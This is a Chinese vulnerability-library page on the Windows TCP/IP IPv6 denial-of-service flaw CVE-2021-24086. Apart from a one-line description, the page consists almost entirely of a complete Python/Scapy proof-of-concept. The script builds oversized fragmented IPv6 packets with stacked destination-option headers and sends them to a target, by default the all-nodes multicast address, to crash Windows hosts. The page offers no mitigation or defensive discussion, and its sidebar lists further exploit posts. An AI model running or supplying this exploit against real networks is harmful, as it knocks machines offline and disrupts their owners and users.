Windows TCP-IP拒绝服务漏洞 (CVE-2021-24086)

060

# Windows TCP/IP拒绝服务漏洞 (CVE-2021-24086)

Windows IPv6协议栈存在一处拒绝服务漏洞,远程攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞可导致目标系统拒绝服务(蓝屏)。

poc.py:

“`py
# Axel ‘0vercl0k’ Souchet – April 7 2021
from scapy.all import *
import argparse

def frag6(target, frag_id, bytes, nh, frag_size = 1008):
”’Ghetto fragmentation.”’
assert (frag_size % 8) == 0
leftover = bytes
offset = 0
frags = []
while len(leftover) > 0:
chunk = leftover[: frag_size]
leftover = leftover[len(chunk): ]
last_pkt = len(leftover) == 0
# 0 -> No more / 1 -> More
m = 0 if last_pkt else 1
assert offset < 8191 pkt = Ether() \ / IPv6(dst = target) \ / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \ / chunk offset += (len(chunk) // 8) frags.append(pkt) return frags def pull_the_trigger(args): '''Trigger CVE-2021-24086 patched in REL2102.''' frag_id = random.randint(0, 0xffffffff) second_pkt_id = (~frag_id & 0xffffffff) reassembled_pkt = IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xa0)), ]) \ / IPv6ExtHdrFragment( id = second_pkt_id, m = 1, nh = 17, offset = 0 ) \ / UDP(dport = 31337, sport = 31337, chksum=0x7e7f) reassembled_pkt = bytes(reassembled_pkt) assert (len(reassembled_pkt) % 8) == 0, 'not aligned' frags = frag6(args.target, frag_id, reassembled_pkt, 60) print(f'{len(frags)} fragments, total size {hex(len(reassembled_pkt))}') sendp(frags, iface= args.iface) reassembled_pkt_2 = Ether() \ / IPv6(dst = args.target) \ / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \ / 'doar-e ftw' sendp(reassembled_pkt_2, iface = args.iface) def main(): parser = argparse.ArgumentParser() parser.add_argument('--target', default = 'ff02::1') parser.add_argument('--iface', default = 'eth1') args = parser.parse_args() pull_the_trigger(args) return if __name__ == '__main__': main() ``` https://github.com/0vercl0k/CVE-2021-24086

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞库
喜欢就支持一下吧
点赞0赞赏 分享
棉花糖的头像-棉花糖会员站糖心会员
会员必看手册(1.8.8版本 25.12.12更新)-棉花糖会员站
会员必看手册(1.8.8版本 25.12.12更新)
会员必看手册(1.8.8版本 25.12.12更新)
2025年12月1日 3.8W+
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
2025年7月3日 1.5W+
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
2024年12月17日 8571
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6337
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
2024年3月25日 4559
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
2024年6月8日 3754
相关推荐
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6337
金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站
金蝶EAS autoLogin.jsp远程代码执行
金蝶EAS autoLogin.jsp远程代码执行
2025年7月4日 2437
百度网盘Windows客户端存在远程命令执行-棉花糖会员站
百度网盘Windows客户端存在远程命令执行
百度网盘Windows客户端存在远程命令执行
2025年9月4日 2304
大华 evo-runs/v1.0/receive RCE-棉花糖会员站
大华 evo-runs/v1.0/receive RCE
大华 evo-runs/v1.0/receive RCE
2025年7月11日 1992
wps 远程代码执行 rce-棉花糖会员站
wps 远程代码执行 rce
wps 远程代码执行 rce
2025年7月18日 1837
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行-棉花糖会员站
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
2025年7月4日 1705
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站糖心会员
北京万维盈创科技发展有限公司污染源在线监控系统AddorEditArea.aspx AreaIndex参数SQL注入
北京万维盈创科技发展有限公司污染源在线监控系统ConfigPerm.aspx RoleID参数SQL注入
深圳勤杰软件有限公司勤杰DHR数智人力资源共享平台ScanLogin.ashx loginId参数存在SQL注入
网络安全自查表.docx
FineReport 帆软报表前台远程代码执行
紫光电子档案管理系统存在目录遍历
最近一周热门文章

1FineReport 帆软报表前台远程代码执行

棉花糖的头像-棉花糖会员站糖心会员2025年12月24日
9999798

2offsec WEB-300 课程:高级 Web 攻击和利用

棉花糖的头像-棉花糖会员站糖心会员2025年12月21日
糖心会员会员专属754

3金和OA AjaxForDepartmentCollect.ashx SQL注入

棉花糖的头像-棉花糖会员站糖心会员2025年12月20日
9999689

4东胜物流软件 GetAuthorityRange 存在SQL注入

棉花糖的头像-棉花糖会员站糖心会员2025年12月22日
9999686

5友加畅捷管理系统 RepFile.ashx 存在文件上传致RCE

棉花糖的头像-棉花糖会员站糖心会员2025年12月18日
9999684

6英赛特互联网客户服务平台shrz.asp 存在 SQL注入

棉花糖的头像-棉花糖会员站糖心会员2025年12月23日
9999682
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密